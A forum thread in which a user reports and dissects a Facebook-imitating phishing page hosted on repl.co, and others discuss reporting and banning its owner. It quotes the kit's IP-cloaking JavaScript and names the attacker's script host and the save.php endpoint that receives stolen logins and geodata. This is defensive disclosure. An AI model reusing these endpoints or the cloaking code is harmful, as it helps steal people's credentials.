Ask coding questions

← Back to all posts
repl's Being Abused for Phishing
RavinduL (15)

I received the following repl.co link over Facebook, which leads to a phishing page that resembles Facebook.

https://colorfullightcyantask.dd315b4f10v.repl.co/#0.42331671848072316

IMHO, repl.it badly needs a feature to report these!

Peeking at the code,

  • They've banned a bunch of IPs from that page, redirecting them to as song "Hawái" by "Maluma"...

    var bannedips = ["73.144.32.114", "99.38.175.146", "172.58.121.35", "68.58.189.0", "72.168.128.90", "68.36.174.182", "172.58.121.225", "24.99.251.90", "278.0.0.48.102", "11.11.11.11"]
    var ip = '<!--#echo var="REMOTE_ADDR"-->'
    var handleips=bannedips.join("|")
    handleips=new RegExp(handleips, "i")
    if (ip.search(handleips)!=-1){ 
    alert("Your IP has been banned from this site. Redirecting...")
    window.location.replace("https://www.youtube.com/watch?v=pK060iUFWXg")
    }

    ...no idea why. They seem to belong to a bunch of US ISPs.

  • The page loads a script from https://jordan--001.tk/jp/?api=1&lan=facebooknew&ht=1&counter0=jeansaldo01
  • When you click "log in", it POSTs the values of the form along with a bunch of geographical data retrieved via GeoJS, to https://jordan--001.tk/jp/save.php?api=1&lan=facebooknew&ht=1&counter0=jeansaldo01.
  • They also grab an image from https://whos.amung.us/widget/jeansaldo01. whos.amung.us which looks like a website traffic analytics tool.

Report them: https://www.enom.com/help/abusepolicy.aspx and [email protected].

Commentshotnewtop
SixBeeps (3023)

Looks like the user has a few different Repls for this: https://repl.it/@dd315b4f10v

Honestly I'd contact Repl.it directly for this rn. I've heard that a Report User functionality is in the works, so problems like these can be more easily resolved.

RavinduL (15)

@SixBeeps nice find! Out of curiosity, how did you map the repl to the user? 😅

SixBeeps (3023)

@RavinduL The format for Repl.it sites are ReplName.Username.repl.co. In the link you gave, colorfullightcyantask is the name of the Repl, dd315b4f10v is the user.

JosephSanthosh (1183)

There should be a way to track down the IP Address of this user. @SixBeeps

PieroMaddaleni (1)

@SixBeeps Generally to ban such users from accessing our platform and to see if they have any other accounts from said address. Also, I've passed this on to the rest of the team, so within an hour or two something should happen.

SixBeeps (3023)

@PieroMaddaleni Yeah, but they could very well be using a VPN, which would eliminate the entire purpose of an IP ban.

AmazingMech2418 (909)

Seems like the person is banned...

AmazingMech2418 (909)

@AmazingMech2418 Also, their only remaining repl:

ridark (87)

@RavinduL when I go to https://clubhouseguard.com/ now it brings me to google.com is this a remake of it too, or is it the real one, cause some users can find a domain that is exactly the same as another

Battledash2 (1)

Cool they're banned xD

HahaYes (1213)

oh wow thats bad.

PattanAhmed (1103)

Where do you find his Repl?
I mean this guy:-
https://repl.it/@dd315b4f10v